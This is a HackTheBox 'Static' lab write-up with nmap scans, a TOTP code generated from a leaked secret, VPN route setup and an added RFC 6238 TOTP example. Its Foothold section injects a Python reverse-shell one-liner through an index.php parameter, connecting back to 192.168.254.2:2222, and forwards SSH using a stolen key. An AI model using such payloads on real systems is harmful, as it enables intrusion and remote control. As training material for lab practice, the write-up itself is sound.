HackTheBox-Static

NMAP

PORT     STATE SERVICE REASON         VERSION                             
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 16:bb:a0:a1:20:b7:82:4d:d2:9f:35:52:f4:2e:6c:90 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCyM3ZYCZb4Brnei3KsMgp18Z1bj/LergclItE15gBjvpKqrol6BwKJoXexCMpUT+THzjpvRtKZKandJhGAqqUg+6nWzucemV1mk8X2LNvCIGdjErJSR5xBoGnXBA7zukgcZpsM4w/WU2X3SoGlyf6oSMJUa8C/wfOIYk+HRudgrC7Z91zXTOyznUTZf/J00xXCgHXNcIWNthocAkCcE8MdYbmLU1qe0UZu/nwBgFApA6KeQAx5h4Ud91lDNq0EOF0wkbXZUuDMCMyiL8UCp4UYwLCBGYCfgYQXHqJq/GcPefRbUs/XEE2CXSebhVsyHhtvRRBUiNZszks9enCUFGB
| 256 ca:ad:63:8f:30:ee:66:b1:37:9d:c5:eb:4d:44:d9:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNf6FprVNh/Yi39D1fB5G7C/WiaREa9qZMAwv2jRhAz71cYsIwuBxUitj+0TjPTSG/r7+bdEEsAQmkgTxkPfrjU=
| 256 2d:43:bc:4e:b3:33:c9:82:4e:de:b6:5e:10:ca:a7:c5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINnml/gfiZRSzXbYCQkMsc1H84hQjJTvcB3soJtwaJNM
2222/tcp open ssh syn-ack ttl 62 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFhedw/OTRm1/n5R5PpuH9+jPs5j81N7nsTUaje8g0HxCOuIDij/+O+xmAYRpDV60ADB8/Ioe0wULEWnheVojyNRsYe0XuAmhRlUDducqHI3Xyo+KuSI/tYj5CSR4g8zNnWp9YRmlxXOOu2TXHx483eXdeL750hFTkYulGyK9HrU0N8N8YWQH4texZ7gxGAYUGGBoakcVfSDBzvld9qgEs137ZSdtI4D7Em183Y12dmUZo74uNEHgJmeDKYUnWChwNeaW7Zl5yTyPEi9J3sIqsqjuHGo7apLwpyd0I1EWmhSnCyrNq5U8BPV677DBWw5EF2XiP+JRHOBcoNq5eO9nf
| 256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNVf3s2ZPSKXQraO42ZjobZnZzMTskFcq4+3sPsNNCzUg0bBlRd5OLa0BKg5x6p3Xn8L+t66j1aL07A9ARtfqPw=
| 256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIODBH7Wgp6xHhtscsZzHnrgNBefLriYH601FqYRUOVNU
8080/tcp open http syn-ack ttl 63 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/vpn/ /.ftp_uploads/

PORT 8080 (HTTP)

pip install pyotp

import pyotp
totp = pyotp.TOTP('orxxi4c7orxwwzlo')
print(totp.now())

ip route add 172.20.0.10 via 172.30.0.9 dev tun9
ip route add 172.20.0.11 via 172.30.0.9 dev tun9
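pyotp hides the arithmetic behind `TOTP(...).now()`. As an added example (not code from the writeup), the block below implements RFC 6238 TOTP from scratch so the computation is visible, and adds the server-side half that the writeup never shows: a verifier that tolerates a small amount of clock drift and compares codes in constant time. It is checked against the RFC 6238 test vectors; the only page-derived value is the base32 secret from the writeup, and the RFC test secret and the window size of one step are assumptions of this example.

```python
"""RFC 6238 TOTP generation and verification, written from scratch.

Added example for this writeup, not code from the original post.  The base32
secret below comes from the writeup; the RFC 6238 test-vector secret and the
one-step verification window are assumptions of this example.
"""
import base64
import hashlib
import hmac
import struct
import time
from typing import Optional

# Secret shown in the writeup (base32, as pyotp expects it).
WRITEUP_SECRET = "orxxi4c7orxwwzlo"
# RFC 4226 / RFC 6238 test-vector secret: ASCII "12345678901234567890" in base32.
RFC_TEST_SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"


def _b32key(secret_b32: str) -> bytes:
    """Decode a base32 secret, tolerating lowercase and missing '=' padding."""
    s = secret_b32.strip().upper()
    return base64.b32decode(s + "=" * (-len(s) % 8))


def hotp(secret_b32: str, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter,
    then dynamic truncation to `digits` decimal digits."""
    mac = hmac.new(_b32key(secret_b32), struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret_b32: str, at: Optional[float] = None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with counter = floor(unix_time / step)."""
    at = time.time() if at is None else at
    return hotp(secret_b32, int(at // step), digits)


def verify_totp(secret_b32: str, candidate: str, at: Optional[float] = None,
                window: int = 1, step: int = 30, digits: int = 6) -> bool:
    """Server-side check: accept the current step and `window` steps on either
    side (clock drift), comparing in constant time so timing does not leak digits."""
    at = time.time() if at is None else at
    counter = int(at // step)
    ok = False
    for delta in range(-window, window + 1):
        expected = hotp(secret_b32, counter + delta, digits)
        # Accumulate with |= instead of returning early so every attempt costs
        # the same number of comparisons.
        ok |= hmac.compare_digest(expected, candidate)
    return ok


if __name__ == "__main__":
    # RFC 6238 vector: T=59 with the SHA-1 test secret gives 287082.
    print("RFC 6238 vector @ T=59:", totp(RFC_TEST_SECRET, 59))
    print("code for the writeup's secret right now:", totp(WRITEUP_SECRET))
```

`totp(WRITEUP_SECRET)` produces the same six digits as `pyotp.TOTP('orxxi4c7orxwwzlo').now()` for the same 30-second step, which is a quick way to confirm the decoding and truncation are right. On the defensive side, `verify_totp` is the shape a login handler should have: a bounded window rather than an open-ended search, and `hmac.compare_digest` rather than `==`.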

WEB

PORT   STATE SERVICE REASON         VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFhedw/OTRm1/n5R5PpuH9+jPs5j81N7nsTUaje8g0HxCOuIDij/+O+xmAYRpDV60ADB8/Ioe0wULEWnheVojyNRsYe0XuAmhRlUDducqHI3Xyo+KuSI/tYj5CSR4g8zNnWp9YRmlxXOOu2TXHx483eXdeL750hFTkYulGyK9HrU0N8N8YWQH4texZ7gxGAYUGGBoakcVfSDBzvld9qgEs137ZSdtI4D7Em183Y12dmUZo74uNEHgJmeDKYUnWChwNeaW7Zl5yTyPEi9J3sIqsqjuHGo7apLwpyd0I1EWmhSnCyrNq5U8BPV677DBWw5EF2XiP+JRHOBcoNq5eO9nf
| 256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNVf3s2ZPSKXQraO42ZjobZnZzMTskFcq4+3sPsNNCzUg0bBlRd5OLa0BKg5x6p3Xn8L+t66j1aL07A9ARtfqPw=
| 256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIODBH7Wgp6xHhtscsZzHnrgNBefLriYH601FqYRUOVNU
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29
| http-ls: Volume /
| SIZE TIME FILENAME
| 19 2020-04-03 15:18 info.php
| - 2020-03-26 09:40 vpn/
|_
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Index of /
Service Info: Host: 172.20.0.10; OS: Linux; CPE: cpe:/o:linux:linux_kernel

DB

PORT     STATE SERVICE REASON         VERSION
3306/tcp open mysql? syn-ack ttl 63
| fingerprint-strings:
| GenericLines:
| 5.5.5-10.4.12-MariaDB-1:10.4.12+maria~bionic
| l6h)2^bS
| YD)=8C&4oU=o
| mysql_native_password
| #HY000Proxy header is not accepted from 172.30.0.9
| LDAPBindReq:
| 5.5.5-10.4.12-MariaDB-1:10.4.12+maria~bionic
| @86F?F$}
| l)"m$g]xh}^<
| mysql_native_password
| afp:
| 5.5.5-10.4.12-MariaDB-1:10.4.12+maria~bionic
| re"uMix
| Ay_NJfC])UNg
|_ mysql_native_password

Foothold

ssh -L 8888:192.168.254.3:80 www-data@172.20.0.10 -i id_rsa
import requests

# Command passed through the "a" parameter of index.php; it connects a shell
# back to 192.168.254.2:2222 (the tunnel set up above).
payload = '/usr/bin/python3 -c \'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
# Send it as a query parameter so requests URL-encodes it rather than
# concatenating raw quotes and spaces into the URL.
r = requests.get("http://192.168.254.3/index.php", params={"a": payload})
print(r.text)
